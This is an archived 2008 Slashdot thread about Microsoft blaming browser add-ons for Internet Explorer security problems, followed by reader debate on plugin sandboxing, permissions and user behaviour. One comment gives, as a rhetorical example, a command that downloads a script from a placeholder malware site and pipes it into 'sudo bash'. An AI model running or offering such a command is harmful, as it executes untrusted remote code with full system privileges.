Slashdot Log In
Microsoft Blames Add-Ons For Browser Woes
Posted by
timothy
on Fri Nov 21, 2008 03:58 PM
from the sounds-semi-reasonable dept.
from the sounds-semi-reasonable dept.
darthcamaro writes "Running IE and been hacked? Don't blame Microsoft — at least that's what their security types are now arguing. 'One of the things we've seen in the last two years is that attackers aren't even going after the browser itself anymore,' Eric Lawrence, Security Program Manager on Microsoft's Internet Explorer team, said. 'The browser is becoming a harder target and there are many more browsers. So attackers are targeting add-ons.'
This kinda makes sense since whether you're running IE, Firefox, Safari or Chrome you could still be at risk if there is a vulnerability in Flash, PDF, QuickTime or another popular add-on. Or does it?"
Related Stories
This discussion has been archived.
No new comments can be posted.
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
Full
Abbreviated
Hidden
Loading... please wait.
Duh (Score:5, Insightful)
Did anyone seriously believe Microsoft wouldn't try to make Internet Explorer look at least "not as bad as they say"?
!news
I'll still blame you for everything else. (Score:5, Insightful)
Re:I'll still blame you for everything else. (Score:5, Informative)
Parent
Re:I'll still blame you for everything else. (Score:5, Funny)
That would be an add-on problem.
Parent
Re:I'll still blame you for everything else. (Score:5, Funny)
(Yes, I know I am going to get voted down for attempting to defend IE in any capacity...they should really just add -1 Disagree and be done with it)
Much more needed is "-1, Reverse psychology"
(runner-up is "+1, your uid is prime")
Parent
Re:I'll still blame you for everything else. (Score:5, Informative)
IE7 is definately a standard-ignoring bastard. And assuming you're an FF advocate, remember it didnt pass Acid2 until FF3. And IE8 is shipping in a standard-complaint mode by default, which should help all browsers out.
Complaining that Firefox didn't pass Acid2 until v3 doesn't make a lot of sense if you understand why the test was made. No browsers adhere to all standards 100%, but all the browsers except IE do a fairly decent job of rendering pages the way they're supposed to. So when Acid2 was created, the idea (AFAIK) was to put together a complex rendering that would expose a selection of bugs that would cause every major browser to fail it. It was supposed to be a sort of test that said, "even if your browser is doing a pretty good job, here are some places where it might fall apart."
So it's not supposed to be the end-all be-all test of standards compliance. You can pass the Acid2 test but still not render normal pages properly, or you could generally do a good job rendering pages but fail the test. The fact that it took Firefox some time to pass isn't an indication that it took them a long time to figure it out, but rather that they fixed in in their new rendering engine and took a while to put that rendering engine into their release version of the browser. There wasn't much reason to rush because it wasn't terribly urgent.
But the question is still whether the browser will generally render pages according to the HTML and CSS standards. Most browsers do far better than IE. As for "standard-compliant mode", I still wonder how standard-compliant it will be. Right now, if I make a page, I generally have to design it to the standards, which will make it run in most browsers, and then figure out how to make it display properly in IE. If IE8 makes it so I don't have to do that anymore, a lot of my complaints will go away.
Parent
Re:I'll still blame you for everything else. (Score:4, Funny)
definately
Definitely. Definitely!
People are going to write they way the write
irregardless of your protests.
You should of just, like, totally ignored him.
Parent
Permissions (Score:5, Insightful)
Re:Permissions (Score:5, Interesting)
Parent
Re:Permissions (Score:5, Informative)
Konqueror runs flash elements and java applets in a separate process with low privileges and high niceness. When flash crashes, it does so by itself.
Parent
What about kde-gnash? (Score:5, Informative)
There are many sites that bring the whole system nearly to a halt when konqueror loads the page. Looking into the CPU usage with top shows that 99% of the CPU time is being used by kde-gnash. Doing a "killall kde-gnash" brings everything back to normal, with a grey square where the flash was.
You are right that konqueror does not crash the whole computer, but that's still very far from the desired result.
Parent
Re:Permissions (Score:5, Insightful)
Just in case anyone was going to interpret this literally:
Ideally, most of these plugins should be setuid as nobody
No, no, a thousand times no!
I suppose "nobody" was a clever concept, whenever it was invented. After all, with only one or two daemons using it, and with so few permissions, that was a reasonably smart move.
These days, nobody is anything but -- since all the more lazily-developed (or lazily-admined) apps just use nobody for their unprivileged user, that means one app's nobody process can easily screw with another app's nobody process.
The right solution would be to either run all plugins in some sort of completely managed, protected VM -- kind of like we do for Javascript -- or create a new Unix user per plugin.
In fact, checking on my system, user ids are four bytes. That is, over four billion possible user ids. Granted, /etc/passwd is woefully ill-equipped to handle that many users -- but given a system which could, there's no reason I know of not to create a new Unix user per currently-visible object tag.
But at the very least, I beg you, create a flash-plugin user, and a java-plugin user, etc. Please, please don't just use nobody. It's like people who programmatically look for a tag called 'foo:bar', instead of bothering to learn how XML namespaces actually work -- you're so close to understanding it, don't stop now!
Parent
Re:Permissions (Score:5, Insightful)
I second that! Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?
Parent
Re: (Score:3, Informative)
Somewhere along the line add-ons got way to much permissions. Why on earth does Adobe Flash have access to my webcam and harddrive?!?
Was there a time when plug-ins couldn't have access to the harddrive?
Re:Permissions (Score:5, Interesting)
IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?
Parent
Re:Permissions (Score:5, Interesting)
Parent
Re:Permissions (Score:5, Insightful)
Well very few if any apps say they require root access unless they of course genuinely NEED root access, not even to install them. Whereas trying to use windows outside of very carefully controlled office and school enviroments without Administrator access is impossible.
Parent
Re:Permissions (Score:5, Interesting)
IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result. Im not MS fanboy, but can they really be blamed for shoddy coding done by third parties?
Should it even be possible for add-ons to do this? Should we really expect the average user to understand that allowing the add-ons to turn off sandbox mode isn't a good idea? At the very least, if an add-on wishes to turn off sandbox mode, a stern but CLEAR warning should be given to the user, and they should have to supply an administrator password. Of course, since vista bugs users for permission so much, most users would just click through the warning thoughtlessly.
I bought my mother a Mac. When she used to use a PC, she would always get caught by trojans. Now I just tell her to never enter her admin password unless performing updates. Problem solved. Because OS X rarely asks for an admin password, when it does, users know that the program wants to do something serious.
Parent
Re: (Score:3, Interesting)
What everyday task does Vista bug you about authorizing?
I've heard this a number of times how it nags people and that the initial release was rough but since SP1 I only see allow or deny when its something I'm doing intentionally that administrative related like installing an update to a program.
I'm genuinely interested in this since I manage a lot of Windows machines and sooner or later I'll have to deal with common complaints or face turning UAC off.
Re:Permissions (Score:4, Interesting)
Are you sure?
Are you really sure?
Positive?
Ok
Parent
Re:Permissions (Score:4, Informative)
right because your typical business users would never say want to change the extention of some think like report.txt they get mailed to them from a host system to something like report.csv so they can open it in Excel. Stuff like the never happens....
Parent
Re:Permissions (Score:4, Insightful)
IE7 is set to run in sandbox mode by default. If a user decides to take it out of that by force or installing addons, then I would gather they would be to blame directly or indirectly for the end result.
Browser A: "would you like to give this plugin root access to your computer?" (note: if you click 'no' then you will be unable to watch the video you requested)
Browser B: (plays the video, having done sufficient programming to ensure that it's safe, allows the video player to run with minimum permissions)
Parent
Re:Permissions (Score:5, Interesting)
can they really be blamed for shoddy coding done by third parties?
Yes they can and here is why:
If a program is going to allow addons then the communications between the addons and the main application should be conducted entirely through interfaces [microsoft.com] in order to preserve abstraction and enforce Design by Contract [wikipedia.org] principles. In this way addons are allowed to plug into the application at precise locations controlled by the main application and to interact with the main application abstractly and in precisely defined and limited ways. Some people might argue that this is too limiting, but it has been my experience in developing software in this style that well designed interface contracts can support a wealth of valuable features while maintaining plug-ability and abstraction throughout the software stack. So I don't buy "It's the addons fault" since the addons, ultimately, can only do things which the main application framework has allowed them to do whether intentionally, through good abstraction, or unintentionally from poor addon framework design.
Parent
I've always said this. (Score:5, Insightful)
The biggest part of internet security is paying attention to where you go. I used IE from the day I started using the internet until the day Chrome was released, and in those years, I got a virus/spyware exactly once: by stupidly going to a keygen site my friend suggested, which was full of malware. The rest of the time, I was fine.
This isn't to say that the technology side should be ignored, but if people actually used their damn heads on the internet, it wouldn't matter much at all which browser they used.
Re: (Score:3, Informative)
I could make some analogy with sex and condoms, but I don't have the energy. So I'll just put it simply: technical problem -> technical solution. No excuses.
Re: (Score:3, Insightful)
How about a car analogy?
If you don't drive your car into downtown Liberty City, San Andreas, Vice City etc. you aren't as likely to get car jacked, even if you leave the top down and the doors unlocked. Same with a browser. If you aren't going to places that are suspect, you won't be as likely to get malware.
Layne
Re:I've always said this. (Score:5, Informative)
This is bull. I'll make an analogy for you with sex and condoms, since you suggested it, and it is a fairly apt analogy.
Using the internet with a secure browser is like having sex with a condom. Using it with an insecure browser is like having sex without a condom. But in the end, condoms or no condoms, if you have sex with a person you know is carrying every kind of STD known to man (or is likely to be), you're the fool. And whether or not you use condoms, the best defense is being smart about your partners.
Of course you should use condoms, that's just prudence. But the first line of defense is knowing who you're having sex with.
And you'll note I said that the technical side of the issue shouldn't be ignored. The fact remains, though, that the most effective thing we can do is user training.
Parent
This is too fun (Score:5, Funny)
I like the sex analogies; I think this should be a new standard for /.
Yours has some good points but:
Surfing the web with IE is like if you were to go to a convenience store to buy eggs and discovered that you had to have sex with the mysterious man behind the counter in order to accomplish this task.
Sure, you can be safe about it: wear condoms, only go to reputable convenience stores with clean-looking men behind the counter, etc. But isn't part of you wondering why you have to open yourself up in this way?
Parent
Re:I've always said this. (Score:5, Insightful)
I would agree with you, if "going" to a malware site meant
curl ftp://malwaresite.com/malware.sh [malwaresite.com] | sudo bash
Normally, that isn't the case, and "going" somewhere poses virtually no risk at all. There's one big exception, and the exception is so big and has so much marketshare, that people confuse that with normality.
"Going to" a site or "opening" an email, doesn't mean "run someone else's code, and make sure to give it the same level of access that I have with a screwdriver."
Parent
But remember (Score:5, Insightful)
If it's Firefox, it's perfectly OK to blame the add-ons.
Those hundreds of memory leaks the FF team fixed in 3.0? All attributed to add-ons, until they were fixed.
And don't get me wrong, FF is a far superior browser to IE any day of the week, but people in crystal rooms shouldn't be hurling stones at others. Or something along those lines.
Bullshit. Plain utter bullshit. (Score:5, Insightful)
Many non-power-users don't use addons at all.
If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.
Re:Bullshit. Plain utter bullshit. (Score:4, Insightful)
Many non-power-users don't use addons at all.
And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.
Parent
Re: (Score:3, Informative)
Yes, I'm still trying to figure out how to teach my Mom that she doesn't need EVERY toolbar in existence.
Re: (Score:3, Informative)
And there are plenty more who install the Yahoo and Google toolbars, plus whatever other crap comes up.
To be fair, those often get loaded by accident - as part of installing adobe reader, or java, or skype, or whatever, and of course its defaulted to install, so unless you read every page of the installation wizard, they get you.
Re:Bullshit. Plain utter bullshit. (Score:5, Insightful)
Really? I don't think I've ever loaded up IE on a non-"power user" person's computer without seeing at least 2 or 3 "search toolbar" addons installed.
If anything, I think "power users" are less likely to have random addons installed since they actually bother to uncheck the "install random crap toolbar" box when they install something.
Parent
Re: (Score:3, Informative)
I think the article was not referring to addons in the sense that a geek thinks of them - adblock, firebug, noscript, etc.
Instead, they mean the biggies - acrobat, flash, quicktime. Most systems will have some or all of those installed.
Re: (Score:3, Interesting)
Many non-power-users don't use addons at all.
If what was being said were true, only us techies would be affected. ...and if that were true no one would care (including us techies) because we know how to protect ourselves.
Many power-users install only a minimal number of addons to do what we want. Stuff like flash-block along with flash. We don't need a dozen fool-bars or huge numbers of widgets.
Re: (Score:3, Interesting)
Can anyone point to an add-on that has more users than ANY brand of browser?
Sun Java? Adobe Flash? Not sure about the former does, but the latter has a much bigger installed-base than IE.
I think they have a point.. (Score:4, Funny)
With the likes of ActiveX, and Silverlight out there, who could blame IE?
Re:I think they have a point.. (Score:4, Insightful)
28 comments and the lowly AC is the first to mention Active X which still runs on IE, by the way, even though they added a UAC-style warning to the user before s/he runs the CraptiveX code.
Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
Parent
Re: (Score:3, Insightful)
Proliferation of malware has shown time and time again that users simply keep clicking "allow" or "ok" without regard to what they're agreeing to run!
Are you trying to make a point that malware is IE's fault? Because if so, you just completely undercut it. What you said is true, and is the reason why users are the biggest threat to computer security, not the browser/OS/whatever.
Re:I think they have a point.. (Score:5, Insightful)
Users are always the biggest security threat. It's the OS's job to protect them. OSX and Linux seem to haev no problem doing this, so why can't Windows?
Parent
Speaking of add-ons (Score:5, Insightful)
Would an example of this include the Active X Control you have to install to be able to run Windows Update?
Plugin model (Score:5, Insightful)
Aren't the responsible for the plugin model in their browser? Aren't they responsible for the OS security?
Take a look at how Chrome handles plugins and then try to pass the buck.
Re:Plugin model (Score:4, Informative)
Take a look at IE protected mode. Vista allows processes started by the user to run with different "integrity levels", effectively subdividing the user account into multiple ad-hoc roles while preserving the identity. IE protected mode is run in "low integrity" - where Vista on intrinsic level protects against modifications to the file system, registry, network access etc.
Every plugin is executed in the same process under the same restrictions. IE offers a standard broker process which can be requested when a file has been downloaded (into a protected cache) and needs to be moved to the user-selected download location. The browser process has very limited capabilities.
If a plugin needs more advanced access than what is provided by his broker process then it must install and invoke its own broker process, as the plugin itself runs under the restricted mode. Flash does this, circumventing the standard IE broker process. It was a bug in the Flash broker process (along with a Java vulnerability)which enabled a security researcher to execute a program on the Vista in the pwn2own contest.
Presumably Adobe will use the same approach on other browsers with a similar model such as Chrome. That is why the security researcher was adament that the Flash flaw could have been used against *any* of the OSes. Chrome actually *also* uses the Vista low integrity feature. Presumably Google will emulate this Vista feature by using separate accounts on other OS'es which do not have process integrity levels (or other role subdivisions of user accounts) as a standard feature. Chrome does use separate processes (in low-integrity mode) for each tab. That does not provide more security against a rouge process taking over the machine, but it does provide more robustness and protect the individual tabs against other tabs going rogue because of browser bugs.
Parent
Largely yes and largely ignorance (mitigation) (Score:5, Interesting)
Exploits for specific document types make compromising people's machines an issue. However, what 99.9% of people that revel in schadenfreude with IE's woes miss or fail to understand (yeah including many people on Slashdot) is that most Windows XP users (which are most Windows users, Vista is only 20%) run as as "root"!!! ("administrator" in the Windows vernacular)
I wrote a utility called RemoveAdmin available on Download.com that leverages an API in Windows (CreateRestrictedToken) that strips administrative rights:
http://www.download.com/RemoveAdmin/3000-2381_4-10824971.html?tag=mncol&cdlPid=10835515
The installer will create shortcuts for IE and Fifrefox but if you look carefully it's really a program with the browser .EXE passed as an argument.
Which means you can strip administrative rights on anything you run... in fact that's exactly what I do. I don't run *anything* that talks on the Net without this.
This means if you stumble across rigged .PDFs, Word documents, etc., etc., you won't suddenly have a keyboard logger installed because ignorant you is running with admin rights.
(Some caveats)
This is version 0.1. What would 1.0 have? A FAQ and user guide for starters. Also, I've seen this version not work in some cases, largely situations where AD is in play (probably because a user has multiple admin credentials).
If you need to run ActiveX controls on a site (poor you if you use IE), just quit IE, go to the site, have the controls installed. Quit IE and re-run IE with the secure link. Likewise this is what you would do before going to WindowsUpate.
And finally, to convince yourself the utility does something useful. Go to any site, "View Source" after you run your browser with the secure link and try to save the resultant .HTML/JavaScript to C:\Windows. You'll find you can't.... since your browser process doesn't have administrative rights (root) and thus any process it launches doesn't either (think of this as a plug-in scenario).
Maybe I'll educate some % of the IT world yet...
Respectfully,
-M
ABM (Score:3, Insightful)
This is marking. Blame ABM, Anybody But Microsoft.
Truth is that IE is not the best browser, but is better than it was.
Firefox is also better than it was, so is Opera, so is Webkit (Safari). In the future, I expect Chrome, if it survives, to be better too.
Why is any of this news? It is really just a marketing departments attemt to deflect blame away from where it belongs.
He's right you know ... (Score:4, Funny)
And if you believe that I've got this great piece of land I'd like to sell you.
It's still your damn fault (Score:5, Insightful)
Now lets see... why is it that we need addons for something a simple as playing a video on youtube or streaming sound? Oh yea, that's right there's no cross platform open standards for doing so because SOMEBODY keeps failing to implement it. Seriously, even if the problem is buggy addons like Flash the whole reason we need those addons is because Microsoft has kept sabotaging the open standards that would have made them redundant. If it was not for Microsoft's continued hampering of web standards the majority of stuff flash is currently being used for could easily have been implemented using just html and javascript. So blame the browser or blame the addons, it's still all your fault in the end.
ActiveXploit (Score:4, Funny)
Wait, did Microsoft just admit that ActiveX is one of the largest security holes ever?